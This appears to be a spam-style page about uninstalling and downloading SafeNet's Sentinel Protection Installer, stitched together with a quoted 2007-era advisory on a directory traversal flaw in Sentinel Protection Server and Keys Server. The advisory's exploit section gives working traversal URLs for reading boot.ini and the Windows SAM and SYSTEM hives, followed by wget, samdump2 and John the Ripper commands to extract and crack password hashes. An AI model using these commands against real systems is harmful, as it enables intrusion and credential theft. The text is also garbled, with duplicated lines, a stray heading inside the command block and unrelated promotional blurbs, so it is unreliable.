Published on November 27th, 2007
This page is not a piece of advice to remove Sentinel System Driver Installer 7.5.1 by SafeNet, Inc. From your PC, we are not saying that Sentinel System Driver Installer 7.5.1 by SafeNet, Inc. Is not a good application. This page only contains detailed instructions on how to remove Sentinel System Driver Installer 7.5.1 supposing you want to.
Summary
- Uninstalling this variant: The software vendor offers the option to remove the entire program Sentinel Protection Installer or SafeNet, Inc. Using Windows Control Panel, visit the vendor’s support site or look for a new, improved version.
- Download sentinel protection installer 7.6.6 for free. Security tools downloads - Sentinel Protection Installer by SafeNet, Inc. And many more programs are available for instant and free download.
- Sentinel Protection Installer 7.5.0.exe is known as Sentinel Protection Installer 7.5.0 and it is developed by SafeNet, Inc. We have seen about 1 different instances of Sentinel Protection Installer 7.5.0.exe in different location. So far we haven't seen any alert about this product.
‘SafeNet Inc.’s Sentinel Protection Server and Sentinel Keys Server products include web servers which are vulnerable to directory traversal attacks. A remote attacker could exploit these vulnerabilities to read arbitrary files with the permissions of the web server, typically SYSTEM .’
Credit:
‘The information has been provided by Elliot Kendall.’
Details
‘Vulnerable Systems:
* Sentinel Protection Server version 7.0.0 through version 7.4.0 and possibly below
* Sentinel Keys Server version 1.0.3 and possibly below
* Sentinel Protection Server version 7.0.0 through version 7.4.0 and possibly below
* Sentinel Keys Server version 1.0.3 and possibly below
Immune Systems:
* Sentinel Protection Server version 7.4.1
* Sentinel Keys Server version 1.0.4
* Sentinel Protection Server version 7.4.1
* Sentinel Keys Server version 1.0.4
Sentinel Protection Server and Sentinel Keys Server run web servers on ports 6002 and 7002, respectively, to allow remote monitoring of key use. The web server software does not santize request paths correctly before using them in system calls. As a result, an attacker can request files outside the web server’s directory root by using the ../ notation to refer to the parent directory of the current directory.
Impact:
A remote attacker could exploit this vulnerability to read sensitive files on the affected system. Attractive targets include the SAM registry hive which contains system password hashes.
A remote attacker could exploit this vulnerability to read sensitive files on the affected system. Attractive targets include the SAM registry hive which contains system password hashes.
Solution:
Upgrade to Sentinel Protection Server version 7.4.1 and Sentinel Keys Server version 1.0.4.
Upgrade to Sentinel Protection Server version 7.4.1 and Sentinel Keys Server version 1.0.4.
First upgrade the Sentinel Driver software to version 7.4.0 if you are using an earlier version: http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip
Then install ‘Security Patch to Sentinel Protection Installer 7.4.0’ http://safenet-inc.com/support/files/SPI740SecurityPatch.zip
Exploit:
Most popular web browsers are not be able to display URLs exploiting this problem. We recommend using wget or lynx instead.
Most popular web browsers are not be able to display URLs exploiting this problem. We recommend using wget or lynx instead.
Substitute port 7002 to target Keys Server instead of Protection Server.
This example will retrieve the C:boot.ini file.
http://XX.XX.XX.XX:6002/../../../../../../boot.ini
http://XX.XX.XX.XX:6002/../../../../../../boot.ini
This example will retrieve a copy of the target system’s SAM registry hive from the Windows repair folder:
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
With the SAM and SYSTEM registry hives, it is possible to extract the system’s local password hashes for offline cracking. For example, using the bkhive, samdump2, and John the Ripper tools:
What Is Sentinel Protection Installer 7.5 08
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john –wordlist=all hashes‘
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john –wordlist=all hashes‘